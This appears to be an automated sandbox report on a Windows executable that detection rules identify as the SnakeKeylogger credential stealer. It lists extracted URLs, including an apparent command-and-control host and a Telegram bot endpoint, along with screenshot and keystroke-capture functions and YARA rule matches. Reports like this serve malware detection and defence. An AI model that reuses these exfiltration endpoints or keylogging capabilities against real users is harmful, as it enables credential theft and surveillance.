                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0H
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/RapidSSLGlobalTLSRSA4096SHA2562022CA1.crl0
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3718826716.00000000013E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab;
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bba7b30f77af5
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabH
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?bba7b30f77
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0Q
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1268385420.00000000032C7000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006999000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.0000000006960000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3725754423.00000000069F8000.00000004.00000020.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.000000000325B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.00000000031FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3724038248.00000000041D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  System Summary

                  barindex
                  Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMemory allocated: 75DE0000 page read and writeJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeMemory allocated: 77DA0000 page read and writeJump to behavior
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 0_2_0308DE4C0_2_0308DE4C
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 0_2_0AB106A80_2_0AB106A8
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 0_2_0AB132C80_2_0AB132C8
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 0_2_0AB106980_2_0AB10698
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_0168C1466_2_0168C146
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_016871186_2_01687118
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_0168A0886_2_0168A088
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_016853626_2_01685362
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_0168D2786_2_0168D278
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_0168C4686_2_0168C468
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_0168C7386_2_0168C738
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_016869A06_2_016869A0
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_0168E9886_2_0168E988
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_0168CA086_2_0168CA08
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_0168CCD86_2_0168CCD8
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_0168CFAB6_2_0168CFAB
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_01683E096_2_01683E09
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_0168F6316_2_0168F631
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_0168E97B6_2_0168E97B
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_01683AB16_2_01683AB1
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_0168FA886_2_0168FA88
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF1E806_2_06DF1E80
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF17A06_2_06DF17A0
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF0B306_2_06DF0B30
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF9C706_2_06DF9C70
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF50286_2_06DF5028
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF95486_2_06DF9548
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF29686_2_06DF2968
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFEAF86_2_06DFEAF8
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFE6B06_2_06DFE6B0
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFE6AF6_2_06DFE6AF
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFE2586_2_06DFE258
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFE2496_2_06DFE249
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF1E776_2_06DF1E77
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFDE006_2_06DFDE00
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF17936_2_06DF1793
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF8B936_2_06DF8B93
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFF3B86_2_06DFF3B8
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF8BA06_2_06DF8BA0
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFEF516_2_06DFEF51
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFEF606_2_06DFEF60
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFEB086_2_06DFEB08
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF0B206_2_06DF0B20
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFD0F86_2_06DFD0F8
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFCCA06_2_06DFCCA0
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF00406_2_06DF0040
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF9C6D6_2_06DF9C6D
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFFC686_2_06DFFC68
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF501F6_2_06DF501F
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFF8106_2_06DFF810
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF00076_2_06DF0007
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFF8016_2_06DFF801
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFDDFF6_2_06DFDDFF
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFD9996_2_06DFD999
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFD9A86_2_06DFD9A8
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFD5506_2_06DFD550
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DF95436_2_06DF9543
                  Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exeCode function: 6_2_06DFD5406_2_06DFD540
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000000.1255275199.0000000000F0A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegeWD.exeD vs VbcXXnmIwPPhh.exe
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1268385420.00000000032C7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs VbcXXnmIwPPhh.exe
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1266065314.00000000015BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs VbcXXnmIwPPhh.exe
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1283325923.0000000007D2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs VbcXXnmIwPPhh.exe
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1282208749.0000000007730000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs VbcXXnmIwPPhh.exe
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs VbcXXnmIwPPhh.exe
                  Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs VbcXXnmIwPPhh.exe
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3728527291.00000000073D9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs VbcXXnmIwPPhh.exe
                  Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000446000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs VbcXXnmIwPPhh.exe
                  Source: VbcXXnmIwPPhh.exeBinary or memory string: OriginalFilenamegeWD.exeD vs VbcXXnmIwPPhh.exe
                  Source: VbcXXnmIwPPhh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: VbcXXnmIwPPhh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
